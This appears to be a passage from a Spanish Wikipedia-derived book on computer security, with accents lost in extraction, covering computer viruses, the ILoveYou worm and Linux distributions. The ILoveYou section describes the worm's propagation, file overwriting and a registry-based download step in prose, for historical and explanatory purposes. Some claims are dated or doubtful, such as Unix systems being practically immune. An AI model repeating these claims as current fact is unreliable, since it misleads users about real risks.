You are on page 1of 148

Contenidos

Artculos
Virus informtico ILoveYou Distribucin Linux Servidor Ingeniera social (seguridad informtica) Blaster Ataque de denegacin de servicio Ping de la muerte Anonymous Nuke Flags Ataque smurf Antivirus Ciencias de la computacin Cortafuegos (informtica) Bastion host Lista de control de acceso Firestarter Unified Threat Management RFC 2979 ZoneAlarm Uncomplicated Firewall Gufw Ipfw PF (software) Cracking (software) Crack informtico Cracker Password cracking Razor 1911 Desbordamiento de bfer Escner de puertos Exploit Seguridad informtica 1 5 7 14 16 18 19 22 23 27 28 28 29 33 38 43 46 47 48 49 49 52 53 55 55 58 58 59 61 61 63 68 69 71

Inseguridad informtica Desbordamiento de pila Desbordamiento de montculo Shellcode Error de software Hacker Melissa (informtica) Analizador de paquetes Phishing Pharming Cross-site scripting Spam Troyano (informtica) War dialing Memoria de acceso aleatorio Jerarqua de memoria Controlador de memoria Circuito integrado Circuito impreso

78 80 80 80 83 85 88 92 93 100 102 106 114 118 118 125 126 127 132

Referencias
Fuentes y contribuyentes del artculo Fuentes de imagen, Licencias y contribuyentes 140 144

Licencias de artculos
Licencia 146

Virus informtico

Virus informtico
Un virus informtico es un malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el cdigo de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en un computadora, aunque tambin existen otros ms inofensivos, que solo se caracterizan por ser molestos. Los virus informticos tienen, bsicamente, la funcin de propagarse a travs de un software, no se replican a s mismos porque no tienen esa facultad[citarequerida] como el gusano informtico, son muy nocivos y algunos contienen adems una carga daina (payload) con distintos objetivos, desde una simple broma hasta realizar daos importantes en los sistemas, o bloquear las redes informticas generando trfico intil. El funcionamiento de un virus informtico es conceptualmente simple. Se ejecuta un programa que est infectado, en la mayora de las ocasiones, por desconocimiento del usuario. El cdigo del virus queda residente (alojado) en la memoria RAM de la computadora, incluso cuando el programa que lo contena haya terminado de ejecutarse. El virus toma entonces el control de los servicios bsicos del sistema operativo, infectando, de manera posterior, archivos ejecutables que sean llamados para su ejecucin. Finalmente se aade el cdigo del virus al programa infectado y se graba en el disco, con lo cual el proceso de replicado se completa.

Historia
El primer virus atac a una mquina IBM Serie 360 (y reconocido como tal). Fue llamado Creeper, creado en 1972. Este programa emita peridicamente en la pantalla el mensaje: I'm a creeper... catch me if you can! (Soy una enredadera... agrrame si puedes!). Para eliminar este problema se cre el primer programa antivirus denominado Reaper (cortadora). Sin embargo, el trmino virus no se adoptara hasta 1984, pero stos ya existan desde antes. Sus inicios fueron en los laboratorios de Bell Computers. Cuatro programadores (H. Douglas Mellory, Robert Morris, Victor Vysottsky y Ken Thompson) desarrollaron un juego llamado Core War, el cual consista en ocupar toda la memoria RAM del equipo contrario en el menor tiempo posible. Despus de 1984, los virus han tenido una gran expansin, desde los que atacan los sectores de arranque de disquetes hasta los que se adjuntan en un correo electrnico.

Virus informticos y sistemas operativos


Los virus informticos afectan en mayor o menor medida a casi todos los sistemas ms conocidos y usados en la actualidad. Cabe aclarar que un virus informtico mayoritariamente atacar slo el sistema operativo para el que fue desarrollado, aunque ha habido algunos casos de virus multiplataforma.

MS-Windows
Las mayores incidencias se dan en el sistema operativo Windows debido, entre otras causas, a: Su gran popularidad, como sistema operativo, entre los computadores personales, PC. Se estima que, en 2007, un 90% de ellos usaba Windows.[citarequerida] Esta popularidad basada en la facilidad de uso sin conocimiento previo alguno, motiva a los creadores de software malicioso a desarrollar nuevos virus; y as, al atacar sus puntos dbiles, aumentar el impacto que generan. Falta de seguridad en esta plataforma (situacin a la que Microsoft est dando en los ltimos aos mayor prioridad e importancia que en el pasado). Al ser un sistema muy permisivo con la instalacin de programas ajenos a ste, sin requerir ninguna autentificacin por parte del usuario o pedirle algn permiso especial para ello

Virus informtico en los sistemas ms antiguos (en los Windows basados en NT se ha mejorado, en parte, este problema). A partir de la inclusin del Control de Cuentas de Usuario en Windows Vista o Windows 7, y siempre y cuando no se desactive, se ha solucionado este problema. Software como Internet Explorer y Outlook Express, desarrollados por Microsoft e incluidos de forma predeterminada en las ltimas versiones de Windows, son conocidos por ser vulnerables a los virus ya que stos aprovechan la ventaja de que dichos programas estn fuertemente integrados en el sistema operativo dando acceso completo, y prcticamente sin restricciones, a los archivos del sistema. Un ejemplo famoso de este tipo es el virus ILOVEYOU, creado en el ao 2000 y propagado a travs de Outlook. La escasa formacin de un nmero importante de usuarios de este sistema, lo que provoca que no se tomen medidas preventivas por parte de estos, ya que este sistema est dirigido de manera mayoritaria a los usuarios no expertos en informtica. Esta situacin es aprovechada constantemente por los programadores de virus.

Unix y derivados
En otros sistemas operativos como las distribuciones GNU/Linux, BSD, OpenSolaris, Solaris, Mac OS X y otros basados en Unix las incidencias y ataques son prcticamente inexistentes. Esto se debe principalmente a: Tradicionalmente los programadores y usuarios de sistemas basados en Unix han considerado la seguridad como una prioridad por lo que hay mayores medidas frente a virus, tales como la necesidad de autenticacin por parte del usuario como administrador o root para poder instalar cualquier programa adicional al sistema. Los directorios o carpetas que contienen los archivos vitales del sistema operativo cuentan con permisos especiales de acceso, por lo que no cualquier usuario o programa puede acceder fcilmente a ellos para modificarlos o borrarlos. Existe una jerarqua de permisos y accesos para los usuarios. Relacionado al punto anterior, a diferencia de los usuarios de Windows, la mayora de los usuarios de sistemas basados en Unix no pueden normalmente iniciar sesiones como usuarios "administradores' o por el superusuario root, excepto para instalar o configurar software, dando como resultado que, incluso si un usuario no administrador ejecuta un virus o algn software malicioso, ste no daara completamente el sistema operativo ya que Unix limita el entorno de ejecucin a un espacio o directorio reservado llamado comnmente home. Aunque a partir de Windows Vista, se pueden configurar las cuentas de usuario de forma similar. Estos sistemas, a diferencia de Windows, son usados para tareas ms complejas como servidores que por lo general estn fuertemente protegidos, razn que los hace menos atractivos para un desarrollo de virus o software malicioso. En el caso particular de las distribuciones basadas en GNU/Linux y gracias al modelo colaborativo, las licencias libres y debido a que son ms populares que otros sistemas Unix, la comunidad aporta constantemente y en un lapso de tiempo muy corto actualizaciones que resuelven bugs y/o agujeros de seguridad que pudieran ser aprovechados por algn malware.

Caractersticas
Dado que una caracterstica de los virus es el consumo de recursos, los virus ocasionan problemas tales como: prdida de productividad, cortes en los sistemas de informacin o daos a nivel de datos. Una de las caractersticas es la posibilidad que tienen de diseminarse por medio de replicas y copias. Las redes en la actualidad ayudan a dicha propagacin cuando stas no tienen la seguridad adecuada. Otros daos que los virus producen a los sistemas informticos son la prdida de informacin, horas de parada productiva, tiempo de reinstalacin, etc. Hay que tener en cuenta que cada virus plantea una situacin diferente.

Virus informtico

Mtodos de propagacin
Existen dos grandes clases de contagio. En la primera, el usuario, en un momento dado, ejecuta o acepta de forma inadvertida la instalacin del virus. En la segunda, el programa malicioso acta replicndose a travs de las redes. En este caso se habla de gusanos. En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anmalos o imprevistos. Dichos comportamientos pueden dar una pista del problema y permitir la recuperacin del mismo. Dentro de las contaminaciones ms frecuentes por interaccin del usuario estn las siguientes: Mensajes que ejecutan automticamente programas (como el programa de correo que abre directamente un archivo adjunto). Ingeniera social, mensajes como ejecute este programa y gane un premio, o, ms comnmente: Haz 2 clics y gana 2 tonos para mvil gratis.. Entrada de informacin en discos de otros usuarios infectados. Instalacin de software modificado o de dudosa procedencia. En el sistema Windows puede darse el caso de que la computadora pueda infectarse sin ningn tipo de intervencin del usuario (versiones Windows 2000, XP y Server 2003) por virus como Blaster, Sasser y sus variantes por el simple hecho de estar la mquina conectada a una red o a Internet. Este tipo de virus aprovechan una vulnerabilidad de desbordamiento de buffer y puertos de red para infiltrarse y contagiar el equipo, causar inestabilidad en el sistema, mostrar mensajes de error, reenviarse a otras mquinas mediante la red local o Internet y hasta reiniciar el sistema, entre otros daos. En las ltimas versiones de Windows 2000, XP y Server 2003 se ha corregido este problema en su mayora.

Mtodos de proteccin y tipos


Los mtodos para disminuir o reducir los riesgos asociados a los virus pueden ser los denominados activos o pasivos.

Activos
Antivirus: son programas que tratan de descubrir las trazas que ha dejado un software malicioso, para detectarlo y eliminarlo, y en algunos casos contener o parar la contaminacin. Tratan de tener controlado el sistema mientras funciona parando las vas conocidas de infeccin y notificando al usuario de posibles incidencias de seguridad. Por ejemplo, al verse que se crea un archivo llamado Win32.EXE.vbs en la carpeta C:\Windows\%System32%\ en segundo plano, ve que es comportamiento sospechoso, salta y avisa al usuario. Filtros de ficheros: consiste en generar filtros de ficheros dainos si el computador est conectado a una red. Estos filtros pueden usarse, por ejemplo, en el sistema de correos o usando tcnicas de firewall. En general, este sistema proporciona una seguridad donde no se requiere la intervencin del usuario, puede ser muy eficaz, y permitir emplear nicamente recursos de forma ms selectiva.

Virus informtico

Pasivos
Evitar introducir a tu equipo medios de almacenamiento extrables que consideres que pudieran estar infectados con algn virus. No instalar software "pirata", pues puede tener dudosa procedencia. No abrir mensajes provenientes de una direccin electrnica desconocida. No aceptar e-mails de desconocidos. Informarse y utilizar sistemas operativos ms seguros. No abrir documentos sin asegurarnos del tipo de archivo. Puede ser un ejecutable o incorporar macros en su interior.

Tipos de virus e imitaciones


Existen diversos tipos de virus, varan segn su funcin o la manera en que ste se ejecuta en nuestra computadora alterando la actividad de la misma, entre los ms comunes estn: Troyano: Consiste en robar informacin o alterar el sistema del hardware o en un caso extremo permite que un usuario externo pueda controlar el equipo. Gusano: Tiene la propiedad de duplicarse a s mismo. Los gusanos utilizan las partes automticas de un sistema operativo que generalmente son invisibles al usuario. Bombas lgicas o de tiempo: Son programas que se activan al producirse un acontecimiento determinado. La condicin suele ser una fecha (Bombas de Tiempo), una combinacin de teclas, o ciertas condiciones tcnicas (Bombas Lgicas). Si no se produce la condicin permanece oculto al usuario. Hoax: Los hoax no son virus ni tienen capacidad de reproducirse por si solos. Son mensajes de contenido falso que incitan al usuario a hacer copias y enviarla a sus contactos. Suelen apelar a los sentimientos morales ("Ayuda a un nio enfermo de cncer") o al espritu de solidaridad ("Aviso de un nuevo virus peligrossimo") y, en cualquier caso, tratan de aprovecharse de la falta de experiencia de los internautas novatos. Joke: Al igual que los hoax, no son virus, pero son molestos, un ejemplo: una pgina pornogrfica que se mueve de un lado a otro, y si se le llega a dar a errar es posible que salga una ventana que diga: OMFG!! No se puede cerrar!

Acciones de los virus


Algunas de las acciones de algunos virus son: Unirse a un programa instalado en el computador permitiendo su propagacin. Mostrar en la pantalla mensajes o imgenes humorsticas, generalmente molestas. Ralentizar o bloquear el computador. Destruir la informacin almacenada en el disco, en algunos casos vital para el sistema, que impedir el funcionamiento del equipo. Reducir el espacio en el disco. Molestar al usuario cerrando ventanas, moviendo el ratn...

Virus informtico

Enlaces externos
Wikimedia Commons alberga contenido multimedia sobre Virus informtico. Commons Centro de Respuesta a Incidentes de Seguridad (INTECO-CERT) del Gobierno de Espaa - Virus y el software malicioso [1] Antivirus [2] en Open Directory Project Linux y virus, no slo cuestin de popularidad [3] en Kriptpolis. Enciclopedia de virus informticos [4]

Referencias
[1] [2] [3] [4] http:/ / cert. inteco. es/ homeVirusAct/ Actualidad/ Actualidad_Virus/ ?postAction=getHomeValuesVirusAct http:/ / www. dmoz. org/ World/ Espa%C3%B1ol/ Computadoras/ Seguridad/ Antivirus/ http:/ / www. kriptopolis. org/ linux-virus-popularidad http:/ / www. enciclopediavirus. com/ home/ index. php

ILoveYou
i love (o VBS/LoveLetter) es un gusano escrito en VBScript. En mayo del 2000 infect aproximadamente 50 millones de computadores provocando prdidas de ms de 5.500 millones de dlares.

Arquitectura del virus


El virus sobrescribe con su cdigo los archivos con extensiones .VBS y .VBE. Elimina los archivos con extensiones .JS, .JSE, .CSS, .WSH, .SCT y .HTA, y crea otros con el mismo nombre y extensin .VBS en el que introduce su cdigo. Tambin localiza los archivos con extensin .JPG, .JPEG, .MP3 y .MP2, los elimina, y crea otros donde el nuevo nombre est formado por el nombre y la extensin anterior ms VBS como nueva extensin real.[] VBS/LoveLetter llega al usuario en un e-mail que tiene por Asunto: 'ILOVEYOU' e incluye un fichero llamado 'LOVE-LETTER-FOR-YOU. TXT.vbs'. Cuando este virus se ejecuta, crea varias copias de s mismo en el disco duro con los siguientes nombres:

MSKernel32.vbs (en el directorio SYSTEM de Windows) Win32DLL.vbs (en el directorio de instalacin de Windows) LOVE-LETTER-FOR-YOU.TXT.vbs (en el directorio SYSTEM de Windows) Tras esto, el virus crea varias entradas en el registro de configuracin de Windows.

ILoveYou aprovechaba la libreta de contactos del computador afectado para propagarse, logrando una enorme capacidad de difusin.

VBS/LovelLetter comprueba, en el directorio SYSTEM de Windows, la existencia del fichero WinFAT32.exe. Si lo encuentra genera un nmero aleatorio entre 1 y 5, y dependiendo del nmero que resulte, crea la entrada de registro 'HKCU\Software\Microsoft\InternetExplorer\Main\Start, a la que le asigna un valor para bajarse el fichero WIN-BUGSFIX. EXE.[]

ILoveYou Tras realizar esta operacin, el virus genera, en el directorio SYSTEM de Windows, el fichero LOVE-LETTER-FOR-YOU.HTM, que ser el que posteriormente enve por IRC. Despus, el gusano se enva a todas las direcciones que encuentra en el libro de direcciones de Microsoft Outlook. Cuando ya se ha enviado por correo, VBS/LoveLetter realiza su efecto destructivo. En concreto, busca en el path del disco duro y en el de todas las unidades de red archivos con extensin vbs, vbe, js, jse, css, wsh, sct y hta. Cuando los encuentra, los sobreescribe con su cdigo, modifica su tamao y les cambia la extensin a VBS, lo que conlleva la prdida de toda la informacin contenida en los archivos. Si los archivos que encuentra poseen extensin jpg o jpeg tambin los sobreescribe, cambia su tamao y les aade, al final la extensin VBS (quedando como jpg.vbs o jpeg.vbs).[] Si VBS/LoveLetter encuentra un fichero con extensin mp3 o mp2 genera una copia de s mismo con el nombre del archivo encontrado y aade la extensin VBS ocultando los ficheros originales. El virus tambin comprueba si en el directorio en el que se est realizando la bsqueda se encuentra alguno de los siguientes ficheros: mirc32.exe, mlinnk32.exe, mirc.ini, scrip.ini o mirc.hlp. Si los encuentra crea el fichero 'script.ini', que ser el encargado de mandar por IRC el fichero LOVE-LETTER-FOR-YOU.HTM a todo aqul que se conecte al mismo canal que l.

Persecucin de los autores


ILoveYou apareci en internet el 4 de mayo de 2000. El virus se present en un principio en forma de mensaje de correo con el asunto "ILOVEYOU" y un archivo adjunto con el nombre "LOVE-LETTER-FOR-YOU.TXT.vbs", que al ser abierto, infectaba el ordenador y se autoenviaba a las direcciones de correo que el usuario tuviera en su agenda de direcciones. Comenz en Filipinas y le bast un solo da para propagarse por todo el mundo, infectando en Hong Kong, Europa y luego en los Estados Unidos.[1] Cinco das ms tarde, se reconocan 18 mutaciones del virus.[2] Al multiplicarse explosivamente, este gusano condujo a Internet al colapso.
El Parlamento Britnico fue una de las tantas instituciones afectadas por ILoveYou.

El da 8 de mayo, Reonel Ramones, un empleado bancario de 27 aos, fue detenido en Manila por la Oficina Nacional de Investigaciones (NBI) de la polica de Filipinas y acusado preliminarmente de vulnerar la Ley Normativa sobre Instrumentos de Acceso, cuyo principal objetivo es proteger las contraseas para las tarjetas de crdito. Sin embargo, fue liberado al da siguiente por orden de la justicia filipina, al carecer de pruebas suficientes para mantenerlo bajo custodia.[3] La acusacin se haba fundamentado en una queja de un proveedor de servicios de Internet de que el virus se haba originado en el departamento en que Ramones viva con su compaera, Irene de Guzmn, y el hermano de sta, Onel de Guzmn.[4] Todos ellos haban estudiado en el Colegio de Computacin AMA de Manila (AMACC). Tres das ms tarde, el 11 de mayo, Onel de Guzmn se present con su abogado en conferencia de prensa para reconocer que pudo haber trasmitido el virus "accidentalmente".[5] Tomando como base los programas encontrados en el departamento de Guzmn y Ramones por la polica, se dijo en un primer momento que el virus haba sido elaborado por un grupo de estudiantes del Colegio de Computacin AMA denominado "GRAMMERSoft", grupo al cual perteneca Guzmn.[6] Sin embargo, ste luego confesara que haba creado el virus por s solo, y que corresponda a la aplicacin de sus tesis: una gua sobre cmo robar cdigos secretos a travs de Internet o cmo introducirse en un ordenador ajeno y tomar su control.[7]

ILoveYou Pese a que en un principio la Oficina Nacional de Investigaciones (NBI) imput cargos a Guzmn tomando como base la Ley Normativa sobre Instrumentos de Acceso,[8] el 21 de agosto la justicia de Filipinas los desestim todos, puesto que esta Ley no se aplicaba a la intrusin en las computadoras.[9] De hecho, en ese momento Filipinas careca de leyes sobre delitos informticos, y por lo mismo, a Guzmn se le retiraron todos los cargos.

Efectos y daos causados


El virus se propag rpidamente por todo el mundo. El 13 de mayo de 2000 se haban reportado 50 millones de infecciones alrededor del globo,[10] cifra que representaba al 10 por ciento del total de computadores con conexin a Internet en esa poca. El virus atac a El Pentgono, la CIA, el Parlamento Britnico y las grandes empresas. En Espaa, por ejemplo, el 80% de las empresas sufrieron los ataques del virus.[11] Se estim que el monto de los daos causados fue entre 5.5 a 8.7 miles de millones de dlares,[12] derivados principalmente del trabajo de eliminacin de los gusanos de los sistemas infectados. Por otra parte, este hecho dej en manifiesto en Filipinas la necesidad de contar con una legislacin regulatoria de la actividad en Internet. Por lo mismo, el 14 de junio de 2000 se dict la Ley N8.792, que actualmente, en su Seccin 33 sanciona la introduccin de virus computacionales y otros con el objetivo de daar mensajes de datos y documentos electrnicos. Con todo, no pudo ser aplicada en contra de Onel de Guzmn, puesto que el hecho tipificado (la liberacin del virus) haba sido ejecutado antes de la entrada en vigencia de esta ley penal.

Referencias

Distribucin Linux
Una distribucin Linux (coloquialmente llamada distro) es una distribucin de software basada en el ncleo Linux que incluye determinados paquetes de software para satisfacer las necesidades de un grupo especfico de usuarios, dando as origen a ediciones domsticas, empresariales y para servidores. Por lo general estn compuestas, total o mayoritariamente, de software libre, aunque a menudo incorporan aplicaciones o controladores propietarios. Adems del ncleo Linux, las distribuciones incluyen habitualmente las bibliotecas y herramientas del proyecto GNU y el sistema de ventanas X Window System. Dependiendo del tipo de usuarios a los que la distribucin est dirigida se incluye tambin otro tipo de software como procesadores de texto, hoja de clculo, reproductores multimedia, herramientas administrativas, etc. En el caso de incluir herramientas del proyecto GNU, tambin se utiliza el trmino distribucin GNU/Linux.

Arquitectura de distribuciones Linux con componentes GNU (Concepto)

Existen distribuciones que estn soportadas comercialmente, como Fedora (Red Hat), openSUSE (Novell), Ubuntu (Canonical Ltd.), Mandriva, y distribuciones mantenidas por la comunidad como Debian y Gentoo. Aunque hay otras distribuciones que no estn relacionadas con alguna empresa o comunidad, como es el caso de Slackware.

Distribucin Linux

Historia
Antes de que surgieran las primeras distribuciones, un usuario de Linux deba ser algo experto en Unix; no solo deba conocer qu bibliotecas y ejecutables necesitaba para iniciar el sistema y que funcionase, sino tambin los detalles importantes que se requieren en la instalacin y configuracin de los archivos en el sistema. Las distribuciones Linux comenzaron a surgir poco despus de que el ncleo Linux fuera utilizado por otros programadores adems de los creadores originales. Exista mayor inters en desarrollar un sistema operativo que en desarrollar aplicaciones, interfaces para los usuarios o un paquete de software conveniente. Entre las distribuciones ms antiguas se incluan: Dos discos denominados H J Lu's Boot-root con el ncleo y un mnimo de herramientas para utilizar. MCC Interim Linux, que se poda descargar en un servidor pblico FTP de la Universidad de Mnchester en febrero de 1992. TAMU, creado por entusiastas de la Universidad de Texas A&M al mismo tiempo que SLS SLS (Softlanding Linux System). Yggdrasil Linux cre el primer CD-ROM de una distribucin Linux. SLS no estuvo bien mantenida; as pues, Patrick Volkerding lanz una distribucin basada en SLS a la que llam Slackware; lanzada el 16 de julio de 1993.[2] Esta es la distribucin ms antigua que est en desarrollo activo. Los usuarios vieron en Linux una alternativa a los sistemas operativos DOS, Microsoft Windows en la plataforma PC, Mac OS en Apple Macintosh y las versiones de uso bajo licencia (de pago) de UNIX. La mayora de estos primeros usuarios se haban familiarizado con el entorno UNIX en sus trabajos o centros de estudios. Estos adoptaron GNU/Linux por su estabilidad, reducido (o nulo) coste y por la disponibilidad del cdigo fuente del software incluido.

rbol de vida de [1] huevo Linux , lnea del tiempo representando el desarrollo de varias distribuciones Linux

Las distribuciones eran originalmente una cuestin de comodidad para el usuario medio, evitndole la instalacin (y en muchos casos compilacin) por separado de paquetes de uso comn, pero hoy se han popularizado incluso entre los expertos en este tipo de sistemas operativos (UNIX/Linux). Si bien, histricamente, Linux estuvo mejor posicionado en el mercado de los servidores, distribuciones centradas en la facilidad de instalacin y uso, tales como Fedora, Mandriva, OpenSuSE, Knoppix y Ubuntu, entre otras, han logrado una mayor aceptacin en el mercado domstico.

Componentes
El conjunto tpico de una distribucin Linux contiene un ncleo, herramientas y bibliotecas, software adicional, documentacin, un sistema de ventanas, un administrador de ventanas y un entorno de escritorio, este suele ser GNOME o KDE. Gran parte del software incluido es de fuente abierta o software libre y distribuido por sus desarrolladores tanto en binario compilado como en forma de cdigo fuente, permitiendo a sus usuarios modificar o compilar el cdigo fuente original si lo desean. Muchas distribuciones incorporan software privativo, no disponible en forma de cdigo fuente. Muchas distribuciones proveen un sistema de instalacin grfica como lo hacen otros sistemas operativos modernos. Distribuciones independientes como Gentoo Linux, T2 y Linux From Scratch proveen el cdigo fuente de todo el software y solo incluyen los binarios del ncleo, herramientas de compilacin y de un instalador; el instalador

Distribucin Linux compila todo el software para el CPU especfico de la PC del usuario.

Gestin de paquetes
Las distribuciones estn divididas en paquetes. Cada paquete contiene una aplicacin especifica o un servicio. Ejemplos de paquetes son una biblioteca para manejar el formato de imagen PNG, una coleccin de tipografas o un navegador web. El paquete es generalmente distribuido en su versin compilada y la instalacin y desinstalacin de los paquetes es controlada por un sistema de gestin de paquetes en lugar de un simple gestor de archivos. Cada paquete elaborado para ese sistema de paquetes contiene meta-informacin tal como fecha de creacin, descripcin del paquete y sus dependencias. El sistema de paquetes analiza esta informacin para permitir la bsqueda de paquetes, actualizar las libreras y aplicaciones instaladas, revisar que todas las dependencias se cumplan y obtenerlas si no se cuenta con ellas de manera automtica. Algunos de los sistemas de paquetes ms usados son: RPM, creado por Red Hat y usado por un gran nmero de distribuciones de Linux, es el formato de paquetes del Linux Standard Base. Originalmente introducido por Red Hat, pero ahora se usa en muchas distribuciones, como por ejemplo Mandriva. Deb, paquetes Debian, originalmente introducidos por Debian, pero tambin utilizados por otros como Knoppix y Ubuntu. .tgz, usado por Slackware, empaqueta el software usando tar y gzip. Pero, adems, hay algunas herramientas de ms alto nivel para tratar con este formato: slapt-get, slackpkg y swaret. Ebuilds, archivo que contiene informacin acerca de cmo obtener, compilar e instalar un paquete en el sistema Portage de Gentoo Linux con el comando emerge. Generalmente, estas instalaciones se basan en la compilacin de fuentes, aunque algunos paquetes binarios se pueden instalar de esta manera. Pacman, para Arch Linux, usa binarios precompilados distribuidos en un fichero .pkg.tar.gz .pkg.tar.xz. PET, utilizado por Puppy Linux, sus derivados y Quirky, su proyecto hermano. Aunque las distribuciones casi siempre vienen con mucha mayor cantidad de software que los sistemas propietarios, en ocasiones algunos usuarios pueden instalar software que no fue incluido en la distribucin. Un ejemplo podra ser el instalar una versin experimental de alguna de las aplicaciones de la distribucin o alguna alternativa (como podra ser utilizar una aplicacin de KDE dentro de GNOME o viceversa). Si el software es distribuido solo en forma de cdigo fuente, requerir ser compilado por el ordenador. Sin embargo, si el programa es compilado, el paquete no ser registrado por el gestor de paquetes y por lo tanto no podr ser controlado por l. Esto significa que el administrador del equipo tendr que tomar medidas adicionales para mantener el software actualizado. El gestor de paquetes no lo podr hacer automticamente. La mayor parte de las distribuciones instalan los paquetes, incluyendo el ncleo Linux y otras piezas fundamentales del sistema operativo con una configuracin preestablecida. Esto hace la instalacin ms sencilla, especialmente para los usuarios nuevos, pero no es siempre aceptable, pues hay programas que deben de ser cuidadosamente configurados para que sean funcionales, para que operen correctamente con otra aplicacin o para que su seguridad sea robusta. En estos casos, los administradores se ven obligados a invertir tiempo reconfigurando y revisando software soportado por la distribucin. En otras distribuciones la instalacin puede llegar a ser muy lenta, pues es posible ajustar y configurar la mayor parte o la totalidad del software incluido en la distribucin. No todas lo hacen. Algunas ofrecen herramientas de configuracin para ayudar en el proceso. Es tambin posible armar un sistema a la medida en su totalidad, descartando incluso el uso de una distribucin. Lo primero que hay que hacer es generar un sistema base que permita conseguir, compilar, configurar e instalar el cdigo fuente. Generar los binarios de este sistema base requerir de otra mquina que sea capaz de generar los

Distribucin Linux binarios para el dispositivo deseado, esto puede ser alcanzado por medio de una compilacin cruzada. Ver por ejemplo Linux from Scratch.

10

Tipos y tendencias
En general, las distribuciones Linux pueden ser: Comerciales o no comerciales. Ser completamente libres o incluir software privativo. Diseadas para uso en el hogar o en las empresas. Diseadas para servidores, escritorios o dispositivos empotrados. Orientadas a usuarios regulares o usuarios avanzados. De uso general o para dispositivos altamente especializados, como un cortafuegos, un enrutador o un cluster computacional. Diseadas e incluso certificadas para un hardware o arquitectura especficos. Orientadas hacia grupos en especfico, por ejemplo a travs de la internacionalizacin y localizacin del lenguaje, o por la inclusin de varios paquetes para la produccin musical o para computacin cientfica. Configuradas especialmente para ser ms seguras, completas, portables o fciles de usar. Soportadas bajo distintos tipos de hardware.

La diversidad de las distribuciones Linux es debido a cuestiones tcnicas, de organizacin y de puntos de vista diferentes entre usuarios y proveedores. El modo de licenciamiento del software libre permite que cualquier usuario con los conocimientos e inters suficiente pueda adaptar o disear una distribucin de acuerdo a sus necesidades.

Distribuciones que no requieren instalacin (Live CD)


Una distribucin live o Live CD o Live DVD, ms genricamente Live Distro, (traducido en ocasiones como CD vivo o CD autnomo), es una distribucin almacenada en un medio extrable, tradicionalmente un CD o un DVD (de ah sus nombres), que puede ejecutarse desde ste sin necesidad de instalarlo en el disco duro de una computadora, para lo cual usa la memoria RAM como disco duro virtual y el propio medio como sistema de archivos. Cuando el sistema operativo es ejecutado por un dispositivo de slo lectura como un CD o DVD, el usuario necesita utilizar una memoria USB o un disco duro instalado en la mquina para conservar su informacin entre sesiones. La informacin del sistema operativo es usualmente cargada en la memoria RAM. La portabilidad de este tipo de distribuciones las hace ideales para ser utilizadas en demostraciones, operaciones de recuperacin, cuando se utiliza una mquina ajena o como medio de instalacin para una distribucin estndar. Actualmente, casi todas las distribuciones tienen una versin CD/DVD autnomo o vivo.

Desarrollo
Comunidad
La mayora de las distribuciones estn, en mayor o menor medida, desarrolladas y dirigidas por sus comunidades de desarrolladores y usuarios. En algunos casos estn dirigidas y financiadas completamente por la comunidad, como ocurre con Debian GNU/Linux, mientras que otras mantienen una distribucin comercial y una versin de la comunidad, como hace RedHat con Fedora, o SuSE con OpenSuSE. En muchas ciudades y regiones, asociaciones locales conocidas como grupos de usuarios promueven este sistema operativo y el software libre. Suelen ofrecer conferencias, talleres o soporte tcnico de forma gratuita o introduccin a la instalacin de Linux para nuevos usuarios.

Distribucin Linux En las distribuciones y otros proyectos de software libre y cdigo abierto son muy comunes las salas de chat IRC y grupos de noticias. Los foros tambin son comunes, sobre todo en el soporte a usuarios, y las listas de correo suelen ser el medio principal para discutir sobre el desarrollo, aunque tambin se utilizan como medio de soporte al usuario.

11

Escala de desarrollo
Un estudio sobre la distribucin Red Hat 7.1 revel que sta en particular posee ms de 30 millones de lneas de cdigo real. Utilizando el modelo de clculo de costos COCOMO, puede estimarse que esta distribucin requerira 8.000 programadores por ao para su desarrollo. De haber sido desarrollado por medios convencionales de cdigo cerrado, hubiera costado ms de mil millones de dlares en los Estados Unidos.[] La mayor parte de su cdigo (71%) perteneca al lenguaje C, pero fueron utilizados muchos otros lenguajes para su desarrollo, incluyendo C++, Bash, Lisp, Ensamblador, Perl, Fortran y Python. Adems, la licencia predominante en alrededor de la mitad de su cdigo total (contado en lneas de cdigo) fue la GPL en su versin 2. El ncleo Linux contena entonces 2,4 millones de lneas de cdigo, lo que representaba el 8% del total. En un estudio posterior[3] se realiz el mismo anlisis para Debian GNU/Linux versin 2.2. Esta distribucin contena ms de 55 millones de lneas de cdigo fuente, y habra costado 1.900 millones de dlares (ao 2000) el desarrollo por medios convencionales (no libres); el ncleo Linux en octubre de 2003 tiene unas 5,5 millones de lneas ms.

Ejemplos
Distribuciones populares
Entre las distribuciones Linux ms populares se incluyen: Arch Linux, una distribucin basada en el principio KISS, con un sistema de desarrollo continuo entre cada versin (no es necesario volver a instalar todo el sistema para actualizarlo). Debian, una distribucin mantenida por una red de desarrolladores voluntarios con un gran compromiso por los principios del software libre. Fedora, una distribucin lanzada por Red Hat para la comunidad. Ubuntu, una popular distribucin para escritorio basada en Debian y mantenida por Canonical. Kubuntu, la versin en KDE de Ubuntu. Linux Mint, una popular distribucin derivada de Ubuntu. Chakra project, una popular distribucin para escritorio, inicialmente basada en Arch Linux, actualmente se encuentra en un desarrollo independiente. openSUSE, originalmente basada en Slackware es patrocinada actualmente por la compaa SUSE (The Attachmate Group). Puppy Linux, versin para equipos antiguos o con pocos recursos que pesa unos 130 MiB. CentOS, una distribucin creada a partir del mismo cdigo del sistema Red Hat pero mantenida por una comunidad de desarrolladores voluntarios. Gentoo, una distribucin orientada a usuarios avanzados, conocida por la similitud en su sistema de paquetes con el FreeBSD Ports, un sistema que automatiza la compilacin de aplicaciones desde su cdigo fuente. Knoppix, fue la primera distribucin live en correr completamente desde un medio extrable. Est basada en Debian. Mandriva, mantenida por la compaa francesa del mismo nombre, es un sistema popular en Francia y Brasil. Est basada en Red Hat. PCLinuxOS, derivada de Mandriva, pas de ser un pequeo proyecto a una popular distribucin con una gran comunidad de desarrolladores.

